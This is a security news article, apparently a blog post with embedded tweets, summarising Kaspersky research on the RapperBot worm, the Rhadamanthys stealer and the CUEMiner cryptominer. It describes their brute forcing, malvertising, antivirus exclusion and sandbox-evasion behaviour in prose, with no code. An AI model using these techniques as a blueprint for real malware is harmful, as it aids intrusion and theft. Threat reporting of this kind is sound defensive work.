‘RapperBot, Rhadamanthys and CUEMiner’: Look Out for Open Source Uncommon Infection Methods 

Kaspersky has found uncommon methods of attacks, which might be used in the future with many advanced tactics to prove more destruction. The malvertisement and malicious downloads are the key elements.

How is #malware distributed through #BitTorrent and #OneDrive? All the information you need ?https://t.co/cwy9yxYFMq

— Kaspersky (@kaspersky) April 26, 2023

RapperBot: the architecture identifier

RapperBot, an IoT device infecting worm that aims to launch DDoS attacks against non-HTTP targets, uses a distinct C2 command protocol based on Mirai. It was initially discovered in June 2022 and targeted SSH services, but the latest version has removed SSH functionality and is now focusing solely on Telnet. RapperBot has achieved considerable success, as evidenced by the 112k infection attempts from more than 2k unique IP addresses in Q4 2022.

A new version of a Mirai variant called RapperBot is the latest example of malware using relatively uncommon or previously unknown infection vectors to try and spread widely.

RapperBot first surfaced last year as Internet of Things (IoT) #cyberattackhttps://t.co/vbEeglJwbI pic.twitter.com/CZJZIxTK3u

— SPIXNET – High Secure E-Mail Solutions (@SpixnetG) April 21, 2023

RapperBot’s “smart” approach to brute force attacks sets it apart from other worms. It checks the prompt and selects the appropriate credentials based on it, significantly reducing the time it takes to brute force by avoiding needing an extensive list of credentials.

RapperBot identifies the processor architecture before infecting the device. The malware is downloaded using various methods such as wget, curl, tftp, and ftpget. If these methods fail, the worm uploads a malware downloader to the device using “echo” shell commands.

Malverstising agent: Rhadamanthys

Rhadamanthys, a newly discovered information-stealing malware, was first introduced on a Russian cybercriminal forum in September 2022 as a MaaS platform. The author claimed that the malware:

• It is coded in C/C++, while C2 is coded in Golang.
• It can stealthily infect systems.
• It can collect data on CPU types, screen resolutions, supported wallets, and more.
• Can bypass EDR/AV.
• Uses encrypted communication with the C2.

Although the malware was advertised in September 2022, the first samples were not detected until the beginning of 2023. Rhadamanthys initially spread through phishing and spam but have recently been using malvertising.

Multiple Threat Intelligence and Anti-virus vendors have noted the rise of the MaaS Rhadamanthys Stealer. Rhadamanthys is noted as trafficking itself through malicious Google ads targeting AnyDesk, Zoom, Bluestacks, Notepad++, OBS, and more.

It also has a hard to remember name pic.twitter.com/qK81JtnMrs

— vx-underground (@vxunderground) January 19, 2023

Malvertising places malicious advertisements on websites, mobile apps, or search engines. Rhadamanthys leverages both search engine and website-based ad platforms. The malware displays ads that promote legitimate applications but contain links to phishing sites. The phishing sites then distribute fake installers, tricking users into downloading and installing the malware.

During the analysis of Rhadamanthys, a strong link with the Hidden Bee miner was discovered. Both samples use images to conceal the payload, have similar bootstrapping shellcodes, use “in-memory virtual file systems,” and utilize Lua to load plugins and modules.

CUEMiner: Distributive malware

The CUEMiner downloader, written in .NET, is wrapped by a C++-based dropper and connects to a set of URLs that vary from sample to sample to download the miner and configuration settings. It also performs various checks to ensure it runs on bare metal systems, not virtual machines. Once all checks are passed, the malware:

Uncommon infection methods—part 2: Kaspersky researchers discuss infection methods used by Mirai-based RapperBot, Rhadamantys stealer, and CUEMiner: smart brute forcing, malvertising, and distribution through BitTorrent and OneDrive. https://t.co/jbYEVDqbVQ pic.twitter.com/MAJagiQbfQ

— Shah Sheikh (@shah_sheikh) April 13, 2023

• Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
• Retrieves configuration details from a hardcoded URL and saves them in different locations (e.g., c:\logs.uce, %localappdata%\logs. use).
• Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look harmless.
• Downloads the miner and watcher.
• Performs several other tasks, which can be found in our confidential report.
• The miner software is launched if it doesn’t detect any processes that consume significant system resources (e.g., games). When a resource-intensive process like a game is launched, the miner is stopped and only resumed when the process ends. This is done to remain undetected on the system for an extended period.

Concluding thoughts

Less experienced hackers often resort to open-source malware since they lack the necessary expertise and networks to execute large-scale campaigns. If they advance in their criminal career and acquire more knowledge, such as programming and security comprehension, they often reuse and improve critical source code components from open-source malware.

Code recycling and rebranding are also commonly employed by cybercriminals. Many ransomware variations have altered names over time but primarily retain the same code base. In other instances, cybercriminals repurpose parts of the code in new campaigns.